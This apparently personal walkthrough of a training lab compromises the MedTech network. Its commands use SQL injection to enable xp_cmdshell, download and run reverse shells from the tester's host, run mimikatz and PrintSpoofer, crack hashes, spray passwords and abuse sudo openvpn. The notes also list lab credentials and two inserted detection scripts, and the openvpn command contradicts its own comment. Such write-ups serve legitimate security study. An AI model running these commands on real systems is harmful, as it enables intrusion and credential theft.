Medtech Notes - MD

The document details a penetration testing process involving multiple network scans using Nmap to identify open ports and services on various IP addresses. It describes exploiting vulnerabilities, including SQL injection and privilege escalation, to gain unauthorized access and retrieve sensitive information. The testing progresses through various systems, culminating in root access on a VPN server, with evidence of successful exploits documented throughout.

Uploaded by Muhammad Mughal
###### Topology

![[medtec-Topology2.png]]

```bash
nmap -sn 192.168.156.0/24 -v -oG nmap/pingsweet.txt
```

![[Medtech-01-Ping-Sweep.png]]

```bash
nmap -p- -sCV -A 192.168.156.120 --open -oG nmap/192.168.156.120-fullscan.txt
```
![[Medtech-02-192.168.156.120-Full-Scan 1.png]]

```plaintext
nmap -p- -sCV -A 192.168.156.120 --open -oG nmap/192.168.156.120-fullscan.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 23:51 EDT
Nmap scan report for 192.168.156.120
Host is up (0.061s latency).
Not shown: 64769 closed tcp ports (conn-refused), 764 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 84:72:7e:4c:bb:ff:86:ae:b0:03:00:79:a1:c5:af:34 (RSA)
| 256 f1:31:e5:75:31:36:a2:59:f3:12:1b:58:b4:bb:dc:0f (ECDSA)
|_ 256 5a:05:9c:fc:2f:7b:7e:0b:81:a6:20:48:5a:1d:82:7e (ED25519)
80/tcp open http WEBrick httpd 1.6.1 (Ruby 2.7.4 (2021-07-07))
|_http-title: PAW! (PWK Awesome Website)
|_http-server-header: WEBrick/1.6.1 (Ruby/2.7.4/2021-07-07)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

whatweb http://192.168.156.120/
http://192.168.156.120/ [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[WEBrick/1.6.1 (Ruby/2.7.4/2021-07-07)], IP[192.168.156.120], Open-Graph-Protocol[website], Ruby[2.7.4,WEBrick/1.6.1], Script[application/ld+json], Title[PAW! (PWK Awesome Website)]
```

```bash
nmap -p- -sCV -A 192.168.156.121 --open -oG nmap/192.168.156.121-fullscan.txt
```

```plaintext
nmap -p- -sCV -A 192.168.156.121 --open -oG nmap/192.168.156.121-fullscan.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 23:46 EDT
Nmap scan report for 192.168.156.121
Host is up (0.064s latency).
Not shown: 64280 closed tcp ports (conn-refused), 1241 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: MedTech
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-09-23T03:47:36
|_ start_date: N/A

whatweb http://192.168.156.121/
http://192.168.156.121/ [200 OK] ASP_NET[4.0.30319], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[192.168.156.121], JQuery[1.12.4], Meta-Author[Offensive Security], Microsoft-IIS[10.0], Modernizr[3.5.0.min], Script, Title[MedTech][Title element contains newline(s)!], X-Powered-By[ASP.NET], X-UA-Compatible[ie=edge]
```

```bash
nmap -p- -sCV -A 192.168.156.122 --open -oG nmap/192.168.156.122-fullscan.txt
```

![[Medtech-04-192.168.156.122-Full-Scan 1.png]]

```plaintext
nmap -p- -sCV -A 192.168.156.122 --open -oG nmap/192.168.156.122-fullscan.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 23:52 EDT
Nmap scan report for 192.168.156.122
Host is up (0.072s latency).
Not shown: 63558 closed tcp ports (conn-refused), 1975 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 60:f9:e1:44:6a:40:bc:90:e0:3f:1d:d8:86:bc:a9:3d (ECDSA)
|_ 256 24:97:84:f2:58:53:7b:a3:f7:40:e9:ad:3d:12:1e:c7 (ED25519)
1194/tcp open openvpn?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

```bash
nmap -p- -sCV -A 192.168.156.254 --open -oG nmap/192.168.156.254-fullscan.txt
```
![[Medtech-05-192.168.156.254-Full-Scan.png]]

Found a web server (WEB02) with an error-based blind SQL injection; the backend is an MSSQL database and the injection point has 2 columns.

![[Medtech-06-WEB02-SQL.png]]

Stacked query injected through the vulnerable parameter to enable `xp_cmdshell`:

```sql
'; EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- -
```

On Kali, generate the reverse shell payload (served from the Kali web server):

```bash
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.45.182 LPORT=4444 -f exe -o shell.exe
```

Injected commands that download and run the payload through `xp_cmdshell`:

```sql
'; EXECUTE xp_cmdshell "powershell.exe wget http://192.168.45.182/shell.exe -OutFile c:\Users\Public\shell.exe" -- -

'; EXECUTE xp_cmdshell "c:\Users\Public\shell.exe" -- -
```
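A detection counterpart to the sp_configure/xp_cmdshell sequence above, added here as an example and not part of the original notes: it scans constructed SQL Server ERRORLOG-style lines (not real lab output; `ATTACKER_HOST` is a placeholder) for the advanced-options/xp_cmdshell enablement chain and for xp_cmdshell executions that carry download tooling.

```python
import re
from typing import List, Tuple

# Constructed sample lines in the style of SQL Server ERRORLOG entries plus one
# statement captured by an audit trace; this is not real data from the lab.
SAMPLE_LOG = [
    "2024-09-23 03:40:01.12 spid55 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-09-23 03:40:01.15 spid55 Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    '2024-09-23 03:41:10.02 spid55 AUDIT stmt: EXECUTE xp_cmdshell "powershell.exe wget http://ATTACKER_HOST/shell.exe -OutFile c:\\Users\\Public\\shell.exe"',
    "2024-09-23 03:42:00.00 spid12 Configuration option 'max server memory (MB)' changed from 2147483647 to 4096. Run the RECONFIGURE statement to install.",
]

CONFIG_RE = re.compile(r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")
XP_RE = re.compile(r"\bxp_cmdshell\b", re.IGNORECASE)
SPID_RE = re.compile(r"\b(spid\d+)\b")
# tooling commonly present in the command string when xp_cmdshell fetches a second stage
DOWNLOAD_RE = re.compile(r"powershell|wget|curl|certutil|Invoke-WebRequest|bitsadmin", re.IGNORECASE)

def scan_sql_log(lines: List[str]) -> List[Tuple[str, int, str]]:
    """Return (severity, line_number, reason) for each suspicious entry."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = CONFIG_RE.search(line)
        if m:  # a configuration change: only the xp_cmdshell chain is interesting
            opt, new = m.group("opt").lower(), m.group("new")
            if opt == "xp_cmdshell" and new == "1":
                findings.append(("high", n, "xp_cmdshell enabled"))
            elif opt == "show advanced options" and new == "1":
                findings.append(("low", n, "advanced options enabled (precursor to xp_cmdshell)"))
            continue
        if XP_RE.search(line):  # a statement that actually calls xp_cmdshell
            if DOWNLOAD_RE.search(line):
                findings.append(("critical", n, "xp_cmdshell executed with download tooling"))
            else:
                findings.append(("high", n, "xp_cmdshell executed"))
    return findings

def xp_cmdshell_chains(lines: List[str]) -> List[str]:
    """spids that enabled 'show advanced options' and then 'xp_cmdshell' (the sp_configure sequence)."""
    advanced, chains = set(), []
    for line in lines:
        m, s = CONFIG_RE.search(line), SPID_RE.search(line)
        if not (m and s) or m.group("new") != "1":
            continue
        opt = m.group("opt").lower()
        if opt == "show advanced options":
            advanced.add(s.group(1))
        elif opt == "xp_cmdshell" and s.group(1) in advanced:
            chains.append(s.group(1))
    return chains
```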

Got a reverse shell.
![[Medtech-07-WEB02-Reverse-shell.png]]


Downloaded winPEAS (winpeas64.exe, saved as win.exe) to WEB02:

```bash
# on Kali: serve the binary
python3 -m http.server 80

# on WEB02: fetch it
certutil -urlcache -split -f http://192.168.45.182/win.exe win.exe
```

winPEAS output:
![[Medtech-08-WEB02-Priv.png]]

Downloaded PrintSpoofer from https://github.com/itm4n/PrintSpoofer/releases, renamed it to print.exe and uploaded it to WEB02:

```bash
# on Kali: serve the binary
python3 -m http.server 80

# on WEB02: fetch and run it
certutil -urlcache -split -f http://192.168.45.182/print.exe print.exe
print.exe -i -c cmd
```

And got NT AUTHORITY\SYSTEM; proof.txt-1:

![[Medtech-09-WEB02-Proof-Txt 1.png]]
After uploading and running mimikatz we get the password for user joe (Flowers1) and the NTLM hash for user offsec, which cracks to lab.

```cmd
certutil -urlcache -split -f http://192.168.45.198/mimikatz.exe mimi.exe

:: the binary was saved as mimi.exe above
mimi.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
```

![[Medtech-10-WEBO2-Joe-Pass.png]]

```bash
hashcat -m 1000 2892d26cdf84d7a70e2eb3b9f05c425e /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
```

###### Moving to FILES02 172.16.135.11

Connect with the cracked credentials:

```bash
evil-winrm -i 172.16.135.11 -u joe -p Flowers1 -s /home/kali/oscp/medtech-labs/WEBO2
```

![[Medtech-12-FILES02-winrm.png]]

local.txt
![[Medtech-13-FILES02-localtxt 1.png]]

Proof.txt-2
![[Medtech-14-FILES02-PROOFTXT 1.png]]

Found fileMonitorBackup.log on FILES02, downloaded it to Kali and found NTLM hashes for users:

![[Medtech-15-FILES02-daisy-hash.png]]
![[Medtech-16-FILES02-toad-hash.png]]
![[Medtech-17-FILES02-wario-hash.png]]
![[Medtech-18-FILES02-gomba-hash.png]]

Cracked wario's NTLM hash and sprayed the password across the network:

```bash
# crack the NTLM hashes (-m 1000) collected from the log
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --force

# check where the cracked password gives WinRM access
netexec winrm 172.16.230.0/24 -u wario -p Mushroom!
```

![[Medtech-19-FILES02-wario-crack.png]]

![[Medtech-20-CLIENT01-wario-access.png]]

###### Moving to CLIENT02 172.16.230.83


```bash
evil-winrm -i 172.16.230.83 -u wario -p Mushroom! -s /home/kali/oscp/medtech-labs
```
Found local.txt on the user's desktop:
![[Medtech-21-CLIENT01-wario-localtxt.png]]

Uploaded winPEAS, ran it and found a possible DLL hijack:

![[Medtech-22-CLIENT01-wario-privesc.png]]

Generated a reverse shell and uploaded it:

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.198 LPORT=4445 -f exe -o add.exe
```

Replaced the service binary with it and started the service:

```powershell
sc.exe start auditTracker
```
![[Medtech-23-CLIENT01-PRIVESC-service.png]]

Caught the reverse shell on the listener:
```bash
rlwrap nc -nvlp 4445
```

And I am NT AUTHORITY\SYSTEM; proof.txt-3:


![[Medtech-24-CLIENT01-Proof-txt.png]]
###### Moving to DEV04 172.16.135.12

Password spraying found RDP access for user yoshi:
![[Medtech-25--Dev04-yoshi-access 1.png]]

RDP access:
```bash
xfreerdp /u:yoshi /p:"Mushroom\!" /v:172.16.230.12 /drive:/home/kali/oscp/medtech-labs /size:1920x1080 /smart-sizing /cert-ignore +clipboard
```

Found local.txt on the desktop (screenshot not included).

Uploaded winPEAS and found backup.exe as a privesc vector. If the winPEAS output shows no colours, enable virtual terminal sequences for the console first:

```cmd
:: enable ANSI colour output in the Windows console, then run winPEAS
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
win.exe
```

![[Medtech-26--Dev04-yoshi-privesc.png]]

Checked the permissions on the binary: we have write and execute permissions.


```powershell
icacls "C:\TEMP\backup.exe"
```
![[Medtech-27--Dev04-yoshi-privesc-permissions.png]]
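A check for the weak service-binary ACLs abused on CLIENT02 (auditTracker) and DEV04 (backup.exe), added here as a defender-side example that is not part of the original notes: it parses `icacls` output (the sample below is constructed, not the lab's real output) and flags binaries that a low-privileged principal can replace. It assumes paths without spaces.

```python
import re
from typing import Dict, List, Set

# Constructed icacls output for two service binaries; not the lab's real output.
SAMPLE_ICACLS = "\n".join([
    r"C:\TEMP\backup.exe BUILTIN\Users:(I)(F)",
    r"                   NT AUTHORITY\SYSTEM:(I)(F)",
    r"                   BUILTIN\Administrators:(I)(F)",
    r"",
    r"C:\Services\auditTracker.exe NT AUTHORITY\SYSTEM:(I)(F)",
    r"                             BUILTIN\Administrators:(I)(F)",
    r"                             BUILTIN\Users:(I)(RX)",
    r"",
    r"Successfully processed 2 files; Failed processing 0 files",
])

# principal:(flags)(rights) at the end of a line; the principal may contain spaces
ACE_RE = re.compile(r"(?:^|\s)(?P<principal>[^\s:][^:]*?):(?P<perms>(?:\([A-Za-z,]*\))+)\s*$")
# rights that let the file be replaced or its ACL/owner changed
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO"}
LOW_PRIV = {"everyone", "users", "builtin\\users", "nt authority\\authenticated users", "nt authority\\interactive"}

def parse_icacls(text: str) -> Dict[str, Dict[str, Set[str]]]:
    """Map each path to {principal: set of right tokens}. Assumes paths without spaces."""
    acls: Dict[str, Dict[str, Set[str]]] = {}
    path = None
    for line in text.splitlines():
        m = ACE_RE.search(line)
        if not m:
            continue  # blank line or the trailing summary
        if not line[0].isspace():  # the first ACE of a file carries the path
            path = line[: m.start("principal")].strip()
            acls[path] = {}
        tokens = {t for grp in re.findall(r"\(([^)]*)\)", m.group("perms")) for t in grp.split(",") if t}
        acls[path].setdefault(m.group("principal"), set()).update(tokens)
    return acls

def is_low_priv(principal: str) -> bool:
    p = principal.lower()
    return p in LOW_PRIV or p.endswith("\\domain users")

def writable_by_low_priv(text: str) -> Dict[str, List[str]]:
    """Paths whose ACL grants write-capable rights to a low-privileged principal."""
    hits: Dict[str, List[str]] = {}
    for path, aces in parse_icacls(text).items():
        bad = [f"{p}: {sorted(r & WRITE_RIGHTS)}" for p, r in aces.items() if is_low_priv(p) and r & WRITE_RIGHTS]
        if bad:
            hits[path] = bad
    return hits
```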

Payload:
```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.198 LPORT=4445 -f exe -o 4445.exe
```

Started a listener:
```bash
rlwrap nc -nvlp 4445
```

On DEV04:
```powershell
# keep a copy of the original binary
move C:\TEMP\backup.exe backup.exe

# put the payload in its place
move ./4445.exe C:\TEMP\backup.exe

. .\backup.exe
```

Got NT AUTHORITY\SYSTEM; proof.txt-4:

![[Medtech-28--Dev04-proof-txt.png]]

Uploaded mimikatz and found leon's password: rabbit:)
![[Medtech-29--Dev04-leon-pass.png]]

Leon is a domain admin:
![[Medtech-30-Dev04-leon-domain-admin.png]]

###### Moving to CLIENT01 172.16.230.82

Using netexec to check where leon has RDP access:
```bash
netexec rdp 172.16.230.0/24 -u leon -p "rabbit:)"
```
![[Medtech-31-Client01-netexec-rdpaccess.png]]

RDP into CLIENT01 as leon:

```bash
xfreerdp /u:leon /p:"rabbit:)" /v:172.16.230.82 /drive:/home/kali/oscp/medtech-labs /size:1920x1080 /smart-sizing /cert-ignore +clipboard
```

And I am a domain admin, so proof.txt-5:


![[Medtech-32-Client01-proof-txt.png]]
###### Moving to PROD01 172.16.230.13

As domain admin I can connect over WinRM:

![[Medtech-33-Prod01-winrm-access.png]]

```bash
evil-winrm -i 172.16.230.13 -u leon -p "rabbit:)" -s /home/kali/oscp/medtech-labs/FILES02
```

And proof.txt-6:
![[Medtech-34-Prod01-Proof-Txt.png]]

###### Moving to DC01 172.16.230.10

```bash
evil-winrm -i 172.16.230.10 -u leon -p "rabbit:)" -s /home/kali/oscp/medtech-labs/FILES02
```

proof.txt-7:
![[Medtech-35-DC01-Proof-Txt.png]]

###### Moving to VPN 192.168.230.122


Used hydra to brute-force the SSH password for 192.168.230.122:
```bash
hydra -l offsec -P /usr/share/wordlists/rockyou.txt ssh://192.168.230.122
```

![[Medtech-36-122-offsec-password-hydra.png]]

Found the password: offsec:password.

```bash
ssh offsec@192.168.230.122
```

```bash
sudo -l
```

![[Medtech-37-122-offsec-sudo.png]]
offsec can run openvpn with sudo:

```bash
# the --up hook runs with root privileges, so it hands back a root shell
sudo openvpn --dev null --script-security 2 --start '/bin/sh -c sh'

# upgrade to a proper tty
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

And I am root; proof.txt-8:


![[Medtech-39-122-Proof-Txt.png]]

Found mario's id_rsa:

![[Medtech-40-122-mario-ssh-id-rsa.png]]

![[Medtech-41-122-mario-ssh-id-rsa.png]]
Copied it and saved it on Kali.

###### Moving to NTP 172.16.230.14

```bash
chmod 600 id_rsa

ssh -i id_rsa mario@172.16.230.14
```

Found local.txt:
![[Medtech-42-NTP-14-local-txt.png]]

###### Moving to WEB01 192.168.230.120

netexec with the offsec password found earlier:


![[Medtech-43-WEB01-netexec-access.png]]

```bash
ssh offsec@192.168.230.120
```

```bash
sudo -l
```
![[Medtech-44-WEB01-sudo-priv.png|1000]]
```bash
sudo -i
```
proof.txt-9:
![[Medtech-45-WEB01-proof-txt.png]]
